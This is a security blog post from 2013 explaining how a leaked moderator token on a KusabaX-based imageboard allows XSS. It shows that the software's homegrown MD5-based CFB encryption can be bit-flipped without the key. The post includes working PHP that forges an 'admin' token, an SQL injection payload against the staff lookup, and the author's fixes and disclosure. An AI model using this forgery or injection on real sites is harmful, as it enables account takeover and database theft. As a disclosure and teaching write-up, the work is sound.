2013 November 13

Misuse of Encryption in KusabaX

In this post I talk about vulnerabilities I found with a site using a fork of KusabaX, some relating to KusabaX's use of encryption, and I explain how these kinds of issues can make a site vulnerable. KusabaX is an open source imageboard that's used by many sites similar to 4chan.

A few months ago, someone decided to attempt to hack a popular imageboard website based on the KusabaX software. On most imageboards, discussion threads are short-lived. Only a set number of pages of threads are kept, often around 10. As more threads are started, threads are pushed off of the last page and deleted. Users often save the thread page in their browser if they wish to personally archive a thread. A user of the site contacted a site moderator asking if they had a saved copy of a certain recently removed thread. The moderator did, and sent the user their saved copy of the thread. As the user predicted, the moderator's saved copy of the thread was made while the moderator was authenticated to the site. The user wasn't successful in using the saved page to exploit the site, and eventually the saved copy of the page was forwarded along to someone who asked me to look into it and see if a danger existed in the first place.

A saved page doesn't contain the cookies that were used in the connection, so one can't just copy cookies from it to steal the authenticated session. A saved page could contain a user's anti-CSRF tokens, though making use of those requires a more involved attack. (Also, KusabaX lacks any CSRF protection on in-thread moderator actions such as banning users anyway, so it's already vulnerable to certain CSRF attacks. I reported the issue five months ago, but no fix has been released. That's not what I want to focus on today, though.)

Imageboards often support tripcodes to identify users. A user enters their name as "Name#trip", the part following the "#" is hashed, and their name is displayed as "Name*!hEpdoZ.tHU*" with the tripcode hash visually formatted differently than the name. This is a simple identification system, but it has a number of weaknesses. One is that the moderator's name and tripcode password were in the name input box, as they usually are when using the site, at the time the moderator saved the page, and they were kept in the saved copy of the page. (In most browsers, when you save a complete web page with its resources, the active document as it is in the browser is saved, rather than the exact html given by the webserver.) One of the page's scripts had hidden the posting form containing the tripcode password, but it was trivially recoverable from the html. This could be used to impersonate the moderator as a user, but the tripcode doesn't specially authenticate them as a moderator to the site, so moderator actions couldn't be done with just the tripcode.

Next, I noticed that the posting form had a few extra fields specific to a moderator session. One was labeled "Mod" with a value like "6402b4gGUa1ALK2j1YxoUNR5WVt8QZWNMsBO6P4KC04=". This is base64 encoded text, though decoding it revealed only 32 bytes of gibberish. Also present was a checkbox interestingly labeled "Raw HTML". In KusabaX, moderators are able to use this option to make posts with arbitrary html, so they can make posts with extra formatting options, iframes/embeds, etc. Getting access to a moderator account allows one to accomplish XSS attacks.
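As a quick check of that length, here is a minimal sketch of the decoding step in PHP. The variable names are mine, and the value is the example one quoted above:

```php
<?php
// The example "Mod" field value quoted above.
$token = '6402b4gGUa1ALK2j1YxoUNR5WVt8QZWNMsBO6P4KC04=';

// Strict mode makes base64_decode() return false on invalid input.
$raw = base64_decode($token, true);

// 44 base64 characters with one '=' of padding decode to 32 bytes.
echo strlen($raw), " bytes\n";

// Hex dump of the "gibberish", since the raw bytes are not printable.
echo bin2hex($raw), "\n";
```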

I made a POST request to the site with the "Mod" password field added using the value from the saved page, the "Raw HTML" checkbox, and a comment of <strong class="test">Test</strong>. My post resulted in bold text with the same html. (No, the site normally doesn't support HTML-like markup.) At this point, I'm able to successfully do XSS attacks. I could make a post with a <script> tag in a new thread containing malicious javascript, allowing me to rewrite the page to my will or cause people's browsers to leak more user or staff credentials to me. All that was required was this mod password.

Now so far, we have an attack, but not a particularly novel one. It's a mildly more interesting version of stealing an admin's cookies. Maybe there should be a discussion on what gets saved invisibly to users in a page when a user saves a page to disk. When someone saves a page to disk, I assume they generally don't imagine that data that can be used to exploit them (authentication or CSRF tokens) gets saved in the page too. Most people would probably benefit from using a simple "Save page as PDF" option instead, though saved PDFs do lack many of the niceties of HTML like flowing content that adapts to different screen sizes, or interactive javascript that may be included in the page.

There's something still bothering me. What was this mod password? Do moderators on KusabaX sites have to memorize this gibberish value? Where does it come from? Does KusabaX not use cookie-based authentication (or even HTTP authentication) like every other web application? KusabaX is made in PHP, which makes cookie-based sessions pretty easy with the $_SESSION global. I've experimented with running KusabaX before, and I don't quite remember having to put up with a giant mod password field. I guess I never bothered with using any of the mod posting form features before. I remember KusabaX having a moderator login page, allowing moderators to choose their own sensible passwords, and keeping moderators authenticated via cookie-based sessions as one would expect.

I inspected the saved page's javascript, and found some interesting stuff. When the page first loaded, it would make an AJAX request to "/md5.php?mod", and then set the "Mod" password field's value to the data received from the URL. If I browsed to "/md5.php?mod" myself, it would give me a gibberish base64 string of similar length, despite me not being authenticated to the site, but if I tried to make a "Raw HTML" post using this value, it wouldn't work. If I reloaded the page, I got a new but still worthless base64 string. I assume this page checks the user's session, and gave the moderator a base64 string that was somehow special. I looked in the KusabaX source for an "md5.php", but didn't find one. That page is custom to this site, though most of these issues aren't. (I assume in stock KusabaX, some part of the moderator interface gives them the Mod password, and they have to copy and paste it into the correct field themselves to use it.) Next I removed the "?mod" parameter from the URL, and accessed md5.php itself. I got a simple page with three text boxes and three submit buttons. The first box is labeled "MD5". Not surprising, as that's the filename too, though I still don't see the connection between that and the "?mod" URL or the mod password. If I put text into that box and hit its button, I get a page with the hex-encoded MD5 hash of the string I put in.

The second box is labeled "MD5 Encrypt". Well, hash functions are sort of like one-way encryption, but I can't imagine why this would be different from the previous field. If I put text into this field and submit, I get a base64 string. If I decode that base64 string, I get binary gibberish that doesn't seem to have any obvious relation to the MD5 hash. Strange.

The third box is labeled "MD5 Decrypt". Danger, Will Robinson, danger! MD5 is a hashing function. There is no standard encryption/decryption algorithm called MD5. I have a feeling we're going to be dealing with homegrown encryption here, which too often means we're going to find something exploitably broken. If I put the base64 string I got from "MD5 Encrypt" into this field and hit submit, I get the original text back.

If I put any of the base64 strings I got from "/md5.php?mod" into "MD5 Decrypt", I got an empty string. If I put the mod password I got from the saved page in, I got what looked like the moderator's username. Let's say it was "bob". The source code of md5.php probably looks something like:

<?php
if ($_SERVER['QUERY_STRING'] == 'mod') {
	echo md5encrypt($_SESSION['modusername']);
} else {
	// md5, md5encrypt, md5decrypt forms
	// ...
}

So the thread page makes an AJAX request to a page which reads a value from $_SESSION, and then gives you an encrypted token to submit to the same server with your mod post later. Why not just read from $_SESSION later when processing mod posts?
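To make that alternative concrete, here is a minimal sketch of deciding who is posting from server-side session data alone. The helper name is hypothetical, and 'modusername' is just the session key guessed in the md5.php sketch above, not a confirmed KusabaX name:

```php
<?php
// Hypothetical helper: identify the posting staff member from session data
// only, so nothing the browser submits can change the answer.
function staff_username_from_session(array $session): ?string {
	if (isset($session['modusername']) && is_string($session['modusername'])) {
		return $session['modusername'];
	}
	return null; // not logged in as staff
}

// In a real request handler this would be called with $_SESSION after
// session_start(); plain arrays are used here so the sketch runs anywhere.
var_dump(staff_username_from_session(['modusername' => 'bob'])); // string(3) "bob"
var_dump(staff_username_from_session([]));                       // NULL
```

With something like this, the posting form would not need a "Mod" field at all.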

I grepped through KusabaX's source on the strings "md5", "encrypt", and "decrypt", and quickly found the md5_encrypt and md5_decrypt functions inside inc/func/encryption.php. So this strangeness is common to KusabaX. Here's their source code:

function get_rnd_iv($iv_len) {
	$iv = '';
	while ($iv_len-- > 0) {
		$iv .= chr(mt_rand() & 0xff);
	}
	return $iv;
}
function md5_encrypt($plain_text, $password, $iv_len = 16) {
	$plain_text .= "\x13";
	$n = strlen($plain_text);
	if ($n % 16) $plain_text .= str_repeat("\0", 16 - ($n % 16));
	$i = 0;
	$enc_text = get_rnd_iv($iv_len);
	$iv = substr($password ^ $enc_text, 0, 512);
	while ($i < $n) {
		$block = substr($plain_text, $i, 16) ^ pack('H*', md5($iv));
		$enc_text .= $block;
		$iv = substr($block . $iv, 0, 512) ^ $password;
		$i += 16;
	}
	return base64_encode($enc_text);
}
function md5_decrypt($enc_text, $password, $iv_len = 16) {
	$enc_text = base64_decode($enc_text);
	$n = strlen($enc_text);
	$i = $iv_len;
	$plain_text = '';
	$iv = substr($password ^ substr($enc_text, 0, $iv_len), 0, 512);
	while ($i < $n) {
		$block = substr($enc_text, $i, 16);
		$plain_text .= $block ^ pack('H*', md5($iv));
		$iv = substr($block . $iv, 0, 512) ^ $password;
		$i += 16;
	}
	return preg_replace('/\\x13\\x00*$/', '', $plain_text);
}

After reviewing the code for a while, I realized that it's an implementation of Cipher-Feedback (CFB) mode encryption, in 16-byte mode with a min(strlen($password), 512) byte shift register, using MD5 as the block cipher. (This works because CFB mode only uses its block cipher in the encrypt direction, even when decrypting.) As far as I can tell, it's actually not too bad for what it is, with two exceptions. First, a cryptographically strong random number generator is not used to generate the IV, and CFB encryption can be broken if the same IV is used to encrypt two different things. Second, a chosen-ciphertext attack can determine the length of the password if it's shorter than 512 bytes, because the line $iv = substr($block . $iv, 0, 512) ^ $password; XORs the shift register against $password, and in PHP the result of XORing two strings has the length of the shorter string.
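The string-XOR truncation is easy to check in isolation. A small sketch follows, using a made-up 5-byte password in place of the real KU_RANDOMSEED and fixed filler bytes in place of a real IV and ciphertext block:

```php
<?php
// PHP's ^ on two strings XORs byte by byte and stops at the end of the shorter one.
var_dump(strlen("ab" ^ "0123456789abcdef")); // int(2)

// Hypothetical 5-byte password, standing in for KU_RANDOMSEED.
$password = "hunt2";
$iv = str_repeat("\x01", 16);

// The initial shift register is already cut down to the password length...
$register = substr($password ^ $iv, 0, 512);
var_dump(strlen($register)); // int(5)

// ...and every later update is truncated the same way.
$block = str_repeat("\x02", 16);
$register = substr($block . $register, 0, 512) ^ $password;
var_dump(strlen($register)); // int(5)
```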

Now, the critical issue isn't in the implementation of that algorithm. Encryption was not needed in this situation. It is not important to try to keep the moderator's username secret from themselves! The important thing was that the mod password was supposed to be a token that could only be generated by the server, and the server could verify who it was for. The critical issue is that the wrong sort of algorithm was used. CFB encryption is not an authenticated encryption algorithm. It only guarantees confidentiality. What was needed here was integrity and authenticity guarantees. This is exactly what an HMAC is supposed to be used for.
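For comparison, here is a minimal sketch of what an HMAC-based token could look like, using PHP's built-in hash_hmac() and hash_equals(). The helper names, the "username:tag" layout, and the key are all my own assumptions for illustration, not KusabaX code:

```php
<?php
// Hypothetical helpers; names and token layout are illustrative only.

// Issue a token of the form "username:hex-hmac".
function make_mod_token(string $username, string $key): string {
	return $username . ':' . hash_hmac('sha256', $username, $key);
}

// Return the username if the tag verifies, or null otherwise.
function verify_mod_token(string $token, string $key): ?string {
	$pos = strrpos($token, ':');
	if ($pos === false) {
		return null;
	}
	$username = substr($token, 0, $pos);
	$tag = substr($token, $pos + 1);
	$expected = hash_hmac('sha256', $username, $key);
	// hash_equals() compares in constant time.
	return hash_equals($expected, $tag) ? $username : null;
}

$key = 'example-server-secret'; // assumption: a long random secret kept on the server
$token = make_mod_token('bob', $key);
var_dump(verify_mod_token($token, $key)); // string(3) "bob"

// Swapping the username without knowing the key invalidates the tag.
$forged = 'admin' . substr($token, 3);
var_dump(verify_mod_token($forged, $key)); // NULL
```

Even with a valid tag, the server would still have to check that the username belongs to a current staff member, and a leaked token could still be replayed as-is, so reading the session directly remains the simpler fix.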

So what does it mean that CFB encryption is not authenticated? It means that it's vulnerable to having its ciphertexts be manipulated to decrypt to something else. For example, if you know the plaintext of a specific ciphertext, you can transform the ciphertext to decrypt to a different plaintext of your choosing, without even knowing the key it was encrypted with.
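The idea can be shown on a toy XOR stream cipher before applying it to KusabaX. In this sketch the random keystream stands in for whatever a real cipher derives from its key, and the "role=..." strings are made-up plaintexts:

```php
<?php
// Toy stream cipher: ciphertext = plaintext XOR keystream.
// The attacker never sees $keystream.
$keystream = random_bytes(16);

$known  = str_pad("role=user", 16, "\0");  // plaintext the attacker knows
$wanted = str_pad("role=admin", 16, "\0"); // plaintext the attacker wants

$ciphertext = $known ^ $keystream;

// Attacker's step: uses only the ciphertext and the two plaintexts.
$tampered = $ciphertext ^ ($known ^ $wanted);

// The legitimate decryption of the tampered ciphertext.
$decrypted = $tampered ^ $keystream;
var_dump(rtrim($decrypted, "\0")); // string(10) "role=admin"
```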

Let's forget about this site's custom md5.php oracle, and just focus on vanilla KusabaX. Imagine if after an attacker exploits Bob's mod password for a while, the site admins figure out that Bob's account is compromised and remove his staff account. Now the mod password can't be used. If we know that "6402b4gGUa1ALK2j1YxoUNR5WVt8QZWNMsBO6P4KC04=" was the mod password of Bob and decrypts to his username "bob", then we can change it to decrypt to "admin" (a default staff account in KusabaX) by XORing the bytes of "bob" (and its padding) and "admin" together, and then XORing that result against the correct part of the ciphertext. Now we have a mod password that verifies us as "admin"! Here's an example of how to do this:

function pad_string($plain_text) {
	$plain_text .= "\x13";
	$n = strlen($plain_text);
	if ($n % 16) $plain_text .= str_repeat("\0", 16 - ($n % 16));
	return $plain_text;
}

function main_example1() {
	$enc = '6402b4gGUa1ALK2j1YxoUNR5WVt8QZWNMsBO6P4KC04=';
	$encd = base64_decode($enc);

	$msg = pad_string("bob");
	$tgt = pad_string("admin");

	$xdf = $msg ^ $tgt;

	$encd = substr($encd, 0, 16) . (substr($encd, 16) ^ $xdf);

	print base64_encode($encd) . "\n";
}
main_example1();

If "6402b4gGUa1ALK2j1YxoUNR5WVt8QZWNMsBO6P4KC04=" decrypted to "bob" by some unknown key, then the result of this function will decrypt to "admin" by the same key.
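That claim can be checked end to end with a key of our own. The sketch below copies the KusabaX functions and pad_string() from the listings above without changes. The key is made up and stands in for the site's real KU_RANDOMSEED, which the attacker's steps never use:

```php
<?php
// get_rnd_iv(), md5_encrypt() and md5_decrypt() are copied from the KusabaX listing above.
function get_rnd_iv($iv_len) {
	$iv = '';
	while ($iv_len-- > 0) {
		$iv .= chr(mt_rand() & 0xff);
	}
	return $iv;
}
function md5_encrypt($plain_text, $password, $iv_len = 16) {
	$plain_text .= "\x13";
	$n = strlen($plain_text);
	if ($n % 16) $plain_text .= str_repeat("\0", 16 - ($n % 16));
	$i = 0;
	$enc_text = get_rnd_iv($iv_len);
	$iv = substr($password ^ $enc_text, 0, 512);
	while ($i < $n) {
		$block = substr($plain_text, $i, 16) ^ pack('H*', md5($iv));
		$enc_text .= $block;
		$iv = substr($block . $iv, 0, 512) ^ $password;
		$i += 16;
	}
	return base64_encode($enc_text);
}
function md5_decrypt($enc_text, $password, $iv_len = 16) {
	$enc_text = base64_decode($enc_text);
	$n = strlen($enc_text);
	$i = $iv_len;
	$plain_text = '';
	$iv = substr($password ^ substr($enc_text, 0, $iv_len), 0, 512);
	while ($i < $n) {
		$block = substr($enc_text, $i, 16);
		$plain_text .= $block ^ pack('H*', md5($iv));
		$iv = substr($block . $iv, 0, 512) ^ $password;
		$i += 16;
	}
	return preg_replace('/\\x13\\x00*$/', '', $plain_text);
}
// Same padding that md5_encrypt() applies internally.
function pad_string($plain_text) {
	$plain_text .= "\x13";
	$n = strlen($plain_text);
	if ($n % 16) $plain_text .= str_repeat("\0", 16 - ($n % 16));
	return $plain_text;
}

// Hypothetical key, standing in for the site's KU_RANDOMSEED.
$key = 'not-the-real-seed';

// What the server would hand to bob.
$token = md5_encrypt('bob', $key);

// Attacker: knows the token and that it decrypts to "bob", but not $key.
$raw = base64_decode($token);
$diff = pad_string('bob') ^ pad_string('admin');
$forged = base64_encode(substr($raw, 0, 16) . (substr($raw, 16) ^ $diff));

var_dump(md5_decrypt($token, $key));  // string(3) "bob"
var_dump(md5_decrypt($forged, $key)); // string(5) "admin"
```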

It's also important to know that manipulating the ciphertext like this causes subsequent 16-byte sections to decrypt to gibberish. (The 16-byte sections that are at least min(strlen($password), 512) bytes after the last modified byte will decrypt normally again.) This is a standard caveat with manipulating Cipher-Feedback mode ciphertexts. If we can fit our changes in a 16-byte area and end the string within that area, then we don't need to worry about this. If this limit were an issue, then we could combine this attack with a replay attack, which this algorithm is vulnerable to as it's a self-synchronizing stream cipher. Here's some code that demonstrates this in further detail if you're curious.

Let's look up KusabaX's code that decrypts and verifies the mod password value, in inc/classes/posting.class.php:

		if (isset($_POST['modpassword'])) {

			$results = $tc_db->GetAll("SELECT `type`, `boards` FROM `" . KU_DBPREFIX . "staff` WHERE `username` = '" . md5_decrypt($_POST['modpassword'], KU_RANDOMSEED) . "' LIMIT 1");

There's an SQL injection vulnerability! Someone forgot to use mysql_real_escape_string() around the result of the decryption there. (Well, prepared statements through PDO ought to be used instead these days.) If you change the mod password to decrypt to "a' or 1=1; -- ", then you don't even need to know any staff usernames. It will always find a staff member for you. You could also use a blind SQL injection attack to slowly read any values from the database, if for some reason you weren't already satisfied with being able to do XSS attacks.
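For reference, here is a minimal sketch of the same lookup done with a PDO prepared statement. It assumes the pdo_sqlite extension and uses an in-memory SQLite database in place of the site's real one. The find_staff() helper, the unprefixed table name, and the sample row are made up for the example:

```php
<?php
// In-memory SQLite database as a stand-in for the real database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE staff (username TEXT, type INTEGER, boards TEXT)");
$db->exec("INSERT INTO staff VALUES ('bob', 2, 'b')"); // made-up sample row

// Hypothetical helper: the username is bound as a parameter and is never
// spliced into the SQL text, so quotes in it have no special meaning.
function find_staff(PDO $db, string $username): array {
	$stmt = $db->prepare('SELECT type, boards FROM staff WHERE username = ? LIMIT 1');
	$stmt->execute([$username]);
	return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

var_dump(count(find_staff($db, 'bob')));            // int(1)
var_dump(count(find_staff($db, "a' or 1=1; -- "))); // int(0)
```

The injection string is simply treated as an unusual username that matches nobody.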

So in summary, if you can get the contents of the mod password field from any site staff member, even one with little or no extra privileges, or a past (possibly disgruntled) staff member that no longer even has privileges, from a KusabaX-based site, then you can perform XSS and SQL injection attacks freely by manipulating that mod password to decrypt to other values. Even if the admin revokes the access of the moderator who leaked the credential, the credential can be modified by an attacker to become valid again.

When you use encryption, you need to know exactly what it does for you, what it guarantees, and what its caveats are. (Does it keep the message secret, and who does it keep it secret from? Does it verify who the message is from? Does it verify that the message isn't manipulated or repeated?) Even if you're using a well-respected library that implements it for you (which you really should), it doesn't matter how correct its code is if you use the wrong type of algorithm for the situation.

I informed the admin of the site in question of all of this, and they patched the site, including removing md5.php and the mod password field entirely in favor of using the already existing session data.